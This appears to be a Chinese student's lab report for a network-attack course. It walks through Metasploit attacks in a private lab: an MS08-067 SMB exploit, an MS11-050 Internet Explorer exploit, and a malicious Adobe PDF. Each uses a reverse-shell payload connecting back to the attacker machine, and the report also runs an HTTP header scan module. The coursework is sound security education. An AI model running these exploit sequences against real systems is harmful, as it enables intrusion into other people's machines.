zoukankan      html  css  js  c++  java
  • 2018-2019 20165208 网络对抗 Exp5 MSF基础

    2018-2019 20165208 网络对抗 Exp5 MSF基础

    实验内容

    本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    1.1一个主动攻击实践,如ms08_067; (1分)

    1.2 一个针对浏览器的攻击,如ms11_050;(1分)

    1.3 一个针对客户端的攻击,如Adobe;(1分)

    1.4 成功应用任何一个辅助模块。(0.5分)

    1.5 报告评分(1分)

    基础问题回答

    用自己的话解释什么是exploit,payload,encode.

    • exploit:指由攻击者利用安全漏洞,将负责攻击的代码payload传送到靶机中。
    • payload:是target在被渗透攻击之后去执行的恶意代码,如ex1的shellcode。
    • encode:进行编码改变payload形态,使其不出现特定字符。

    实践过程记录

    1.一个主动攻击实践,如ms08_067;

     ①攻击机:kali IP:192.168.119.128
     
    ②靶机:windows XP SP3(English) IP:192.168.119.129(失败)
    
    ②靶机:windows 2000 Professional(English) IP:192.168.119.130(成功)
    
    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

      • msf > use exploit/windows/smb/ms08_067_netapi//使用ms08_067漏洞,use后其实是漏洞所在目录路径名
      • msf exploit(ms08_067_netapi) > show payloads//显示回连攻击载荷
      • msf exploit(ms08_067_netapi) > set payload
      • generic/shell_reverse_tcp //tcp反向回连
      • msf exploit(ms08_067_netapi) > set LHOST 192.168.119.128 //攻击机ip
      • msf exploit(ms08_067_netapi) > set LPORT 5208 //攻击端口
      • msf exploit(ms08_067_netapi) > set RHOST 192.168.119.129 //靶机ip,特定漏洞端口已经固定
      • msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
      • msf exploit(ms08_067_netapi) > exploit //攻击
    • 建立会话,攻击失败显示如下:

    • 通过网上查找资料,发现可能是打过补丁的原因,更换虚拟机。

    • 选择靶机windows 2000 Professional(English)。

    • 按上述命令进行操作,记得更换IP。

    • 显示监听成功,dir命令成功。

    2. 一个针对浏览器的攻击,如ms11_050;

    ①攻击机:kali IP:192.168.119.128
    
    ②靶机:windows 7 x64 IP:192.168.119.131 IE:8.0(失败)
    
    ②靶机:windows Sever 2008  IP:192.168.119.132(成功)
    
    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

      • msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞
      • msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
      • msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.119.128 //攻击机ip
      • msf exploit(ms11_050_cobjectelement) > set LPORT 5208 //攻击端口固定
      • msf exploit(ms11_050_cobjectelement) > set URIPATH 5208ky //统一资源标识符路径设置
      • msf exploit(ms11_050_cobjectelement) > exploit
    • 运行靶机浏览器,这时win7出现DNS服务器未响应,尝试解决无果后,更换了虚拟机。

    • 操作同上

    • 在访问http://192.168.119.128:8080/5208ky时,可见攻击机出现访问信息。

    3. 一个针对客户端的攻击,如Adobe;

    ①攻击机:kali IP:192.168.119.128
    
    ②靶机:windows XP sp2 IP:192.168.119.133 
    
    Adobe:9.3
    
    
    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

      • `msf > use windows/fileformat/adobe_cooltype_sing
      • msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp` //tcp反向回连
      • msf exploit(adobe_cooltype_sing) > set LHOST 192.168.119.128 //攻击机ip
      • msf exploit(adobe_cooltype_sing) > set LPORT 5208 //攻击端口
      • msf exploit(adobe_cooltype_sing) > set FILENAME 20165208.pdf //设置生成pdf文件的名字
      • msf exploit(adobe_cooltype_sing) > exploit //攻击
    • 成功生成20165208.pdf。

    • 将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:

      • msf > use exploit/multi/handler //进入监听模块
      • msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
      • msf exploit(handler) > set LHOST 192.168.119.128 //攻击机ip
      • msf exploit(handler) > set LPORT 5208 //攻击端口固定
      • msf exploit(handler) > exploit
    • 然后在靶机上打开20165208.pdf文件。

    • kali连接成功。

    • 攻击机运行ipconfig命令,可显示靶机IP地址。

    • 靶机关闭pdf文件,则失去权限。

    4. 成功应用任何一个辅助模块(scanner/http/http_header 唯一)

    • 使用命令msf > show auxiliary查看所有的辅助模块

    • 在看的时候我试了几个,因为好多命令的描述我不能准确的定位到它功能,最后我选择了scanner/http/http_header

    • info scanner/http/http_header查看命令相关信息。

    • 我们可以看到它的描述: This module shows HTTP Headers returned by the scanned systems。我最初以为它是给我返回浏览器的头部信息,也就是可以监听对方访问网页浏览的是什么。

    • 实际操作:首先use scanner/http/http_header调用模块,然后根据info得出的参数信息对参数进行设定

    use scanner/http/http_header
    set RHOSTS 192.168.119.132
    RHOSTS => 192.168.119.132
    set HTTP_METHOD GET
    set RPORT 8080
    exploit
    
    set RPORT 80
    exploit
    
    

    • 在端口80监听时我们可以看到返回信息Microsoft-IIS/7.0
    • 可以得出结论:目标计算机80端口上运行着IIS 7.0,

    而在历年的IIS版本漏洞中,IIS 6.0、IIS 5.1、IIS 7.5和IIS 7.0受影响的漏洞数居前四位。同时我们可以大概根据IIS 7.0 判断出它的操作系统版本为Win 200或Vista全系列 。这和我们的靶机系统也是匹配的。

    IIS版本 系统版本 受影响漏洞数量
    IIS 5.0 Windows 2000 10
    IIS 5.1 Windows XP 系列 16
    IIS 7.0 Win 2008、Vista全系列 11
    IIS 10.0 Win 10和Win 2016 2

    实验中遇到的问题及解决方法

    1.问题:在主动攻击实践时,操作完exploit后显示 Exploit completed, but no session was created.

    查了资料后我做了以下几个修改尝试:

    我最初设的target参数是0,即自动选择目标系统类型。在尝试解决时我选了设为6。想说会不会这样的匹配度更合适,失败了。

    后来找到过程中看到有说可能是系统打了补丁,使攻击难以进行。所以就选择更换了虚拟机。

    2.问题:在进行针对浏览器的攻击时,靶机显示无法显示该网页。进行诊断后提示是DNS服务器未响应。

    根据网络诊断提示DNS服务器未响应,我进行了三种尝试,分别如下:


    不过,so sad,失败了,最后选择更换为win 2008虚拟机。

    离实战还缺些什么技术或步骤?

    现在的操作限定条件较多,对靶机,对版本,对补丁都多有要求,而对于更接近现实的攻击情况而言,自己的能力还有限,对于代码编写类的依赖已有教程的情况比较多,也就决定了攻击可能已经被破解,从而达不到既定的要求。

    实验感想

    本次实验对MSF做了简单的试操作,在找到合适的虚拟机后实验还是相对清晰、简单的。在这个过程中,学会查找很主要,infoshow targetsshow payloads等命令都帮了我不少忙。在整个实验中第四个模块是我独立完成的,网络上有关我选的这个命令的直接使用教程还是蛮少的,但是可以发现很多其他的例子。举一反三,怀着未知的忐忑去尝试成功后还是蛮有成就感的。

  • 相关阅读:
    洛谷P1586 四方定理
    洛谷P3807 【模板】卢卡斯定理exgcd
    扩展中国剩余定理详解
    HDU 1573 X问题
    POJ 2891 Strange Way to Express Integers
    中国剩余定理详解
    java.lang.UnsupportedClassVersionError: Bad version number in .class file 解决方案
    MySQL对于有大量重复数据表的处理方法
    【一牛鸣】下周或触发新变盘9.16
    Django里面的RequestContext
  • 原文地址:https://www.cnblogs.com/KY-high/p/10698062.html
Copyright © 2011-2022 走看看